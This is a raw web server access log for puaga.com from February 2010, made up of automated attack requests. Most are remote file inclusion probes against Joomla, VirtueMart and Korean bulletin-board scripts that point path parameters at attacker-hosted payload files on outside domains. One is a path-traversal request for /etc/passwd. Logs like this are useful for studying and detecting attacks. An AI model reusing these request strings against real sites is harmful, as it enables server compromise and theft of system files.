213.189.224.16 - - [21/Feb/2010:07:20:23 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:29 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:29 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:20:50 -0800] "GET /logs/access_100202.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:20:50 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:20:50 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:54 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:20:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:21:08 -0800] "GET /logs/access_100121.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:21:11 -0800] "GET /logs/access_100202.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:21:12 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:21:14 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:21:32 -0800] "GET /logs/access_100121.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:21:58 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:07:22:06 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:07:22:06 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:07:22:06 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:22:17 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:22:22 -0800] "GET /logs/access_100131.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:22:22 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:22:23 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:07:22:37 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:07:22:37 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:07:22:38 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:22:53 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:24:28 -0800] "GET /logs/access_100202.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:24:35 -0800] "GET /logs/access_100210.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:24:47 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:25:16 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:25:20 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:25:20 -0800] "GET /logs/access_100111.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:25:20 -0800] "GET /logs/access_100202.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:07:25:20 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:25:33 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:07:26:19 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:26:32 -0800] "GET /logs/access_100124.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:26:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:26:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:27:00 -0800] "GET /logs/access_100116.log%20%20//bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:27:00 -0800] "GET /bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:27:00 -0800] "GET /logs//bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:27:36 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:27:36 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:27:36 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:27:39 -0800] "GET /logs/access_100124.log%20%20//bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:27:42 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:27:42 -0800] "GET /logs/access_100204.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:27:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:28:49 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:28:50 -0800] "GET /logs/access_100116.log//bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:29:14 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:29:24 -0800] "GET /logs/access_100127.log//bad_link.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:07:29:40 -0800] "GET /logs//?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:07:29:40 -0800] "GET /logs/access_100204.log//?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:07:29:41 -0800] "GET /?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:07:29:50 -0800] "GET /logs/access_100127.log//?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:30:20 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:30:28 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:30:38 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:30:44 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:07:31:06 -0800] "GET /index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 3626 "-" "libwww-perl/5.53" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:07:33:04 -0800] "GET /logs/access_100203.log%20%20//?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:07:33:04 -0800] "GET /logs//?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:07:33:05 -0800] "GET /?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt?????? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:07:33:58 -0800] "GET //board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:33:58 -0800] "GET /module///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:33:58 -0800] "GET /module/setup.php///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:34:08 -0800] "GET /module///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:34:08 -0800] "GET //board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:34:08 -0800] "GET /module/setup.php///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
86.109.170.73 - - [21/Feb/2010:07:34:59 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:35:00 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:35:01 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:35:34 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:35:34 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:35:34 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:36:05 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:36:12 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:36:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:36:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
85.119.152.183 - - [21/Feb/2010:07:36:24 -0800] "GET /logs/access_100126.log//index.php?option=com_mambots&mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [21/Feb/2010:07:36:24 -0800] "GET /logs//index.php?option=com_mambots&mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.152.183 - - [21/Feb/2010:07:36:24 -0800] "GET /index.php?option=com_mambots&mosConfig.absolute.path=http://www.phimose-info.de/tools/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:36:49 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:36:49 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:36:49 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:37:31 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:07:37:39 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:07:37:39 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:07:37:39 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:37:48 -0800] "GET /logs/access_100122.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:37:59 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:37:59 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:37:59 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.171.180.4 - - [21/Feb/2010:07:38:00 -0800] "GET /logs//index.php?option=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
88.171.180.4 - - [21/Feb/2010:07:38:00 -0800] "GET /index.php?option=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:38:11 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:38:13 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:38:14 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:39:50 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:40:03 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:40:03 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
